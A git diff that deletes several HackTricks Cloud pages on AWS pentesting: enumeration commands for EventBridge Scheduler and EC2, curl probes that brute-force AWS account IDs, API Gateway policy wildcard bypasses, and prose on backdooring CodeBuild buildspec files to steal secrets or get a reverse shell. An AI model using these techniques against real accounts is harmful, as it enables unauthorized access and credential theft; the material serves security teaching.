- -### Targets - -There are 2 types of targets for a scheduler [**templated (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html), which are commonly used and AWS made them easier to configure, and [**universal (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html), which can be used to call any AWS API. - -**Templated targets** support the following services: - -* CodeBuild – StartBuild -* CodePipeline – StartPipelineExecution -* Amazon ECS – RunTask - * Parameters: EcsParameters -* EventBridge – PutEvents - * Parameters: EventBridgeParameters -* Amazon Inspector – StartAssessmentRun -* Kinesis – PutRecord - * Parameters: KinesisParameters -* Firehose – PutRecord -* Lambda – Invoke -* SageMaker – StartPipelineExecution - * Parameters: SageMakerPipelineParameters -* Amazon SNS – Publish -* Amazon SQS – SendMessage - * Parameters: SqsParameters -* Step Functions – StartExecution - -### Enumeration - -```bash -# List all EventBridge Scheduler schedules -aws scheduler list-schedules - -# List all EventBridge Scheduler schedule groups -aws scheduler list-schedule-groups - -# Describe a specific schedule to retrieve more details -aws scheduler get-schedule --name - -# Describe a specific schedule group -aws scheduler get-schedule-group --name - -# List tags for a specific schedule (helpful in identifying any custom tags or permissions) -aws scheduler list-tags-for-resource --resource-arn -``` - -### Privesc - -In the following page, you can check how to **abuse eventbridge scheduler permissions to escalate privileges**: - -{% content-ref url="../aws-privilege-escalation/eventbridgescheduler-privesc.md" %} -[eventbridgescheduler-privesc.md](../aws-privilege-escalation/eventbridgescheduler-privesc.md) -{% endcontent-ref %} - -## References - -* 
[https://docs.aws.amazon.com/scheduler/latest/UserGuide/what-is-scheduler.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/what-is-scheduler.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md deleted file mode 100644 index c999e66ce..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md +++ /dev/null @@ -1,80 +0,0 @@ -# AWS - Unauthenticated Enum & Access - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## AWS Credentials Leaks - -A common way to obtain access or information about an AWS account is by **searching for leaks**. You can search for leaks using **google dorks**, checking the **public repos** of the **organization** and the **workers** of the organization in **Github** or other platforms, searching in **credentials leaks databases**... or in any other part you think you might find any information about the company and its cloud infa.\ -Some useful **tools**: - -* [https://github.com/carlospolop/leakos](https://github.com/carlospolop/leakos) -* [https://github.com/carlospolop/pastos](https://github.com/carlospolop/pastos) -* [https://github.com/carlospolop/gorks](https://github.com/carlospolop/gorks) - -## AWS Unauthenticated Enum & Access - -There are several services in AWS that could be configured giving some kind of access to all Internet or to more people than expected. Check here how: - -* [**Accounts Unauthenticated Enum**](aws-accounts-unauthenticated-enum.md) -* [**Cloud9 Unauthenticated Enum**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md) -* [**Cloudfront Unauthenticated Enum**](aws-cloudfront-unauthenticated-enum.md) -* [**Cloudsearch Unauthenticated Enum**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md) -* [**Cognito Unauthenticated Enum**](aws-cognito-unauthenticated-enum.md) -* [**DocumentDB Unauthenticated Enum**](aws-documentdb-enum.md) -* [**EC2 Unauthenticated Enum**](aws-ec2-unauthenticated-enum.md) -* [**Elasticsearch Unauthenticated Enum**](aws-elasticsearch-unauthenticated-enum.md) -* [**IAM Unauthenticated Enum**](aws-iam-and-sts-unauthenticated-enum.md) -* [**IoT Unauthenticated Access**](aws-iot-unauthenticated-enum.md) -* [**Kinesis Video Unauthenticated Access**](aws-kinesis-video-unauthenticated-enum.md) 
-* [**Media Unauthenticated Access**](aws-media-unauthenticated-enum.md) -* [**MQ Unauthenticated Access**](aws-mq-unauthenticated-enum.md) -* [**MSK Unauthenticated Access**](aws-msk-unauthenticated-enum.md) -* [**RDS Unauthenticated Access**](aws-rds-unauthenticated-enum.md) -* [**Redshift Unauthenticated Access**](aws-redshift-unauthenticated-enum.md) -* [**SQS Unauthenticated Access**](aws-sqs-unauthenticated-enum.md) -* [**S3 Unauthenticated Access**](aws-s3-unauthenticated-enum.md) - -## Cross Account Attacks - -In the talk [**Breaking the Isolation: Cross-Account AWS Vulnerabilities**](https://www.youtube.com/watch?v=JfEFIcpJ2wk) it's presented how some services allow(ed) any AWS account accessing them because **AWS services without specifying accounts ID** were allowed. - -During the talk they specify several examples, such as S3 buckets **allowing cloudtrai**l (of **any AWS** account) to **write to them**: - -![](<../../../.gitbook/assets/image (260).png>) - -Other services found vulnerable: - -* AWS Config -* Serverless repository - -## Tools - -* [**cloud\_enum**](https://github.com/initstring/cloud_enum): Multi-cloud OSINT tool. **Find public resources** in AWS, Azure, and Google Cloud. Supported AWS services: Open / Protected S3 Buckets, awsapps (WorkMail, WorkDocs, Connect, etc.) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md deleted file mode 100644 index e3a79d5b1..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md +++ /dev/null @@ -1,71 +0,0 @@ -# AWS - Accounts Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Account IDs - -If you have a target there are ways to try to identify account IDs of accounts related to the target. - -### Brute-Force - -You create a list of potential account IDs and aliases and check them - -```bash -# Check if an account ID exists -curl -v https://.signin.aws.amazon.com -## If response is 404 it doesn't, if 200, it exists -## It also works from account aliases -curl -v https://vodafone-uk2.signin.aws.amazon.com -``` - -You can [automate this process with this tool](https://github.com/dagrz/aws_pwn/blob/master/reconnaissance/validate_accounts.py). - -### OSINT - -Look for urls that contains `.signin.aws.amazon.com` with an **alias related to the organization**. - -### Marketplace - -If a vendor has **instances in the marketplace,** you can get the owner id (account id) of the AWS account he used. - -### Snapshots - -* Public EBS snapshots (EC2 -> Snapshots -> Public Snapshots) -* RDS public snapshots (RDS -> Snapshots -> All Public Snapshots) -* Public AMIs (EC2 -> AMIs -> Public images) - -### Errors - -Many AWS error messages (even access denied) will give that information. - -## References - -* [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md deleted file mode 100644 index 24abdac6e..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md +++ /dev/null @@ -1,85 +0,0 @@ -# AWS - API Gateway Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### API Invoke bypass - -According to the talk [Attack Vectors for APIs Using AWS API Gateway Lambda Authorizers - Alexandre & Leonardo](https://www.youtube.com/watch?v=bsPKk7WDOnE), Lambda Authorizers can be configured **using IAM syntax** to give permissions to invoke API endpoints. This is taken [**from the docs**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html): - -```json -{ - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Permission", - "Action": [ - "execute-api:Execution-operation" - ], - "Resource": [ - "arn:aws:execute-api:region:account-id:api-id/stage/METHOD_HTTP_VERB/Resource-path" - ] - } - ] -} -``` - -The problem with this way to give permissions to invoke endpoints is that the **"\*" implies "anything"** and there is **no more regex syntax supported**. - -Some examples: - -* A rule such as `arn:aws:execute-apis:sa-east-1:accid:api-id/prod/*/dashboard/*` in order to give each user access to `/dashboard/user/{username}` will give them access to other routes such as `/admin/dashboard/createAdmin` for example. - -{% hint style="warning" %} -Note that **"\*" doesn't stop expanding with slashes**, therefore, if you use "\*" in api-id for example, it could also indicate "any stage" or "any method" as long as the final regex is still valid.\ -So `arn:aws:execute-apis:sa-east-1:accid:*/prod/GET/dashboard/*`\ -Can validate a post request to test stage to the path `/prod/GET/dashboard/admin` for example. -{% endhint %} - -You should always have clear what you want to allow to access and then check if other scenarios are possible with the permissions granted. 
- -For more info, apart of the [**docs**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html), you can find code to implement authorizers in [**this official aws github**](https://github.com/awslabs/aws-apigateway-lambda-authorizer-blueprints/tree/master/blueprints). - -### IAM Policy Injection - -In the same [**talk** ](https://www.youtube.com/watch?v=bsPKk7WDOnE)it's exposed the fact that if the code is using **user input** to **generate the IAM policies**, wildcards (and others such as "." or specific strings) can be included in there with the goal of **bypassing restrictions**. - -### Public URL template - -``` -https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided} -``` - -### Get Account ID from public API Gateway URL - -Just like with S3 buckets, Data Exchange and Lambda URLs gateways, It's possible to find the account ID of an account abusing the **`aws:ResourceAccount`** **Policy Condition Key** from a public API Gateway URL. This is done by finding the account ID one character at a time abusing wildcards in the **`aws:ResourceAccount`** section of the policy.\ -This technique also allows to get **values of tags** if you know the tag key (there some default interesting ones). - -You can find more information in the [**original research**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) and the tool [**conditional-love**](https://github.com/plerionhq/conditional-love/) to automate this exploitation. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md deleted file mode 100644 index 8f553e9b7..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md +++ /dev/null @@ -1,37 +0,0 @@ -# AWS - Cloudfront Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Public URL template - -``` -https://{random_id}.cloudfront.net -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md deleted file mode 100644 index 9d4227753..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md +++ /dev/null @@ -1,61 +0,0 @@ -# AWS - CodeBuild Unauthenticated Access - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## CodeBuild - -For more info check this page: - -{% content-ref url="../aws-services/aws-codebuild-enum.md" %} -[aws-codebuild-enum.md](../aws-services/aws-codebuild-enum.md) -{% endcontent-ref %} - -### buildspec.yml - -If you compromise write access over a repository containing a file named **`buildspec.yml`**, you could **backdoor** this file, which specifies the **commands that are going to be executed** inside a CodeBuild project and exfiltrate the secrets, compromise what is done and also compromise the **CodeBuild IAM role credentials**. - -Note that even if there isn't any **`buildspec.yml`** file but you know Codebuild is being used (or a different CI/CD) **modifying some legit code** that is going to be executed can also get you a reverse shell for example. - -For some related information you could check the page about how to attack Github Actions (similar to this): - -{% content-ref url="../../../pentesting-ci-cd/github-security/abusing-github-actions/" %} -[abusing-github-actions](../../../pentesting-ci-cd/github-security/abusing-github-actions/) -{% endcontent-ref %} - -## Self-hosted GitHub Actions runners in AWS CodeBuild - -As [**indicated in the docs**](https://docs.aws.amazon.com/codebuild/latest/userguide/action-runner.html), It's possible to configure **CodeBuild** to run **self-hosted Github actions** when a workflow is triggered inside a Github repo configured. This can be detected checking the CodeBuild project configuration because the **`Event type`** needs to contain: **`WORKFLOW_JOB_QUEUED`** and in a Github Workflow because it will select a **self-hosted** runner like this: - -```bash -runs-on: codebuild--${{ github.run_id }}-${{ github.run_attempt }} -``` - -This new relationship between Github Actions and AWS creates another way to compromise AWS from Github as the code in Github will be running in a CodeBuild project with an IAM role attached. 
- -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md deleted file mode 100644 index 89c2f12cd..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md +++ /dev/null @@ -1,37 +0,0 @@ -# AWS - DocumentDB Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Public URL template - -``` -.cluster-..docdb.amazonaws.com -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md deleted file mode 100644 index 8067c97b0..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md +++ /dev/null @@ -1,41 +0,0 @@ -# AWS - DynamoDB Unauthenticated Access - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Dynamo DB - -For more information check: - -{% content-ref url="../aws-services/aws-dynamodb-enum.md" %} -[aws-dynamodb-enum.md](../aws-services/aws-dynamodb-enum.md) -{% endcontent-ref %} - -Apart from giving access to all AWS or some compromised external AWS account, or have some SQL injections in an application that communicates with DynamoDB I'm don't know more options to access AWS accounts from DynamoDB. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md deleted file mode 100644 index ea692e888..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md +++ /dev/null @@ -1,88 +0,0 @@ -# AWS - EC2 Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## EC2 & Related Services - -Check in this page more information about this: - -{% content-ref url="../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %} -[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/) -{% endcontent-ref %} - -### Public Ports - -It's possible to expose the **any port of the virtual machines to the internet**. Depending on **what is running** in the exposed the port an attacker could abuse it. - -#### SSRF - -{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" %} - -### Public AMIs & EBS Snapshots - -AWS allows to **give access to anyone to download AMIs and Snapshots**. You can list these resources very easily from your own account: - -{% code overflow="wrap" %} -```bash -# Public AMIs -aws ec2 describe-images --executable-users all - -## Search AMI by ownerID -aws ec2 describe-images --executable-users all --query 'Images[?contains(ImageLocation, `967541184254/`) == `true`]' - -## Search AMI by substr ("shared" in the example) -aws ec2 describe-images --executable-users all --query 'Images[?contains(ImageLocation, `shared`) == `true`]' - -# Public EBS snapshots (hard-drive copies) -aws ec2 describe-snapshots --restorable-by-user-ids all -aws ec2 describe-snapshots --restorable-by-user-ids all | jq '.Snapshots[] | select(.OwnerId == "099720109477")' -``` -{% endcode %} - -If you find a snapshot that is restorable by anyone, make sure to check [AWS - EBS Snapshot Dump](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump) for directions on downloading and looting the snapshot. 
- -#### Public URL template - -```bash -# EC2 -ec2-{ip-seperated}.compute-1.amazonaws.com -# ELB -http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443 -https://{user_provided}-{random_id}.{region}.elb.amazonaws.com -``` - -### Enumerate EC2 instances with public IP - -{% code overflow="wrap" %} -```bash -aws ec2 describe-instances --query "Reservations[].Instances[?PublicIpAddress!=null].PublicIpAddress" --output text -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md deleted file mode 100644 index 0e491c74e..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md +++ /dev/null @@ -1,63 +0,0 @@ -# AWS - ECR Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
